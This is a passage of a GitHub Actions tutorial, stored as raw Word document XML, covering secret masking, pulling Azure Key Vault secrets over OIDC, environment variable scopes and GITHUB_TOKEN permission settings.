        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ secrets.API_KEY }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> expression is what pulls it in. If it shows up in logs, it'll be replaced by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The built-in secret you already have</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets.GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is auto-generated for every workflow run. It's scoped to your repository and lasts only as long as the run. Use it for anything that talks to the GitHub API — comment on PRs, push releases, label issues. You don't need to create a personal token for this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pulling secrets from Azure Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Secrets is fine for small teams. But if your org standardizes on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Azure Key Vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for everything (a lot of enterprises do — it gives them audit trails, automatic rotation, and a single place to revoke access), you don't want to copy every secret into GitHub Secrets too. Better to fetch them at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The pattern is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticate to Azure from the workflow (preferably via OIDC, no stored credentials).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Pull the secrets you need from Key Vault into the workflow's environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Use them like any other env variable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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permissions: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id-token: write          # required for OIDC to Azure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contents: read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Step 1 — log in to Azure using OIDC (federated credential on an AD app).</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azure/login@v2</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client-id:       ${{ secrets.AZURE_CLIENT_ID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tenant-id:       ${{ secrets.AZURE_TENANT_ID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subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID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Step 2 — pull secrets from the vault into step outputs.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Fetch secrets from Key Vault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id: kv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azure/get-keyvault-secrets@v1</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keyvault: my-prod-keyvault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secrets:  'API-KEY, DB-CONN-STR'</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Step 3 — use them in later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API_KEY:     ${{ steps.kv.outputs.API-KEY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DB_CONN_STR: ${{ steps.kv.outputs.DB-CONN-STR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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Three things worth knowing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OIDC over stored secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">azure/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> example uses GitHub Secrets only for non-sensitive IDs (client, tenant, subscription). The actual auth is OIDC, so no service principal password lives in GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Secret values stay masked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: anything fetched via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">get-keyvault-secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is automatically registered as a secret for that run, so it gets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in logs the same way native GitHub Secrets do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hyphens in names</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: Key Vault doesn't allow underscores in secret names, so most teams use hyphens. That's why you see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">API-KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment variables — three scopes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">You can set env vars at three different levels, and each has different visibility. Knowing which to use is mostly about scoping the surface — the smaller the scope, the safer.</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APP_ENV: production         # workflow-level — every job sees it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REGION: us-east-1       # job-level — every step in this job</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DRY_RUN: 'false'    # step-level — just this one step</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./deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Same scope concept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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>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Defined where</w:t>
            </w:r>
          </w:p>
        </w:tc>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Who sees it</w:t>
            </w:r>
          </w:p>
        </w:tc>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Good for</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Workflow</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env:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> at the top of the file</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Every job, every step</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Truly global values: a default region, a Node version used everywhere.</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Job</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env:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> inside one job</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Every step in that job</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Values one job needs but others don't — e.g., the deploy job needs an environment URL but tests don't.</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Step</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env:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on a single step</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That one step only</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Single-shot values you don't want bleeding into later steps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Lower scopes win when names collide. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">REGION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set at the workflow level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> the job level, the job's value is what the steps inside that job see. If a step also sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">REGION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, the step's value wins for that step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic env vars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need to set an env var at runtime (say, the current build ID):</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echo "BUILD_ID=$(date +%s)" &gt;&gt; $GITHUB_ENV</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echo "Build ID is $BUILD_ID"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$GITHUB_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes it available to all later steps in the same job.</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10. Permissions, contexts, and the built-in variables you'll actually use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the section that fixes the most beginner confusion. Most "why isn't this working" questions come back to one of these three topics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 The permissions model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Every workflow run gets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically. But since 2023, new repositories ship with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">read-only defaults</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for that token. If your workflow tries to comment on a PR, label an issue, or push a tag, it'll blow up with a very confusing message:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="2"/>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Error: Resource not accessible by integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The fix is to ask for what you need:</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permissions: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contents: read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issues: write</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pull-requests: write</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Set at the workflow level (above the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> key) and it applies to everything. Or set it per job if you want tighter control — which is the safer habit:</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label:</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permissions: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issues: write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echo "label the issue"</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The scopes you'll see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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>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When you need it</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contents: write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Pushing commits, creating tags or releases.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issues: write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Creating, commenting on, or labeling issues.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pull-requests: write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Commenting on or updating PRs.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packages: write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Publishing to GitHub Packages / GHCR.</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 write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Triggering other workflows, cancelling runs.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id-token: write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OIDC auth to AWS, Azure, or GCP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to lock everything down, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">permissions: {}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> grants nothing. Useful for paranoid workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Contexts and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ ... }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> expression syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Anywhere you see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">${{ something }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, that's an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a tiny bit of logic evaluated at runtime. Expressions read from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">contexts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, which are pre-populated objects with runtime data.</w:t>
      </w:r>
    </w:p>
    <w:p>
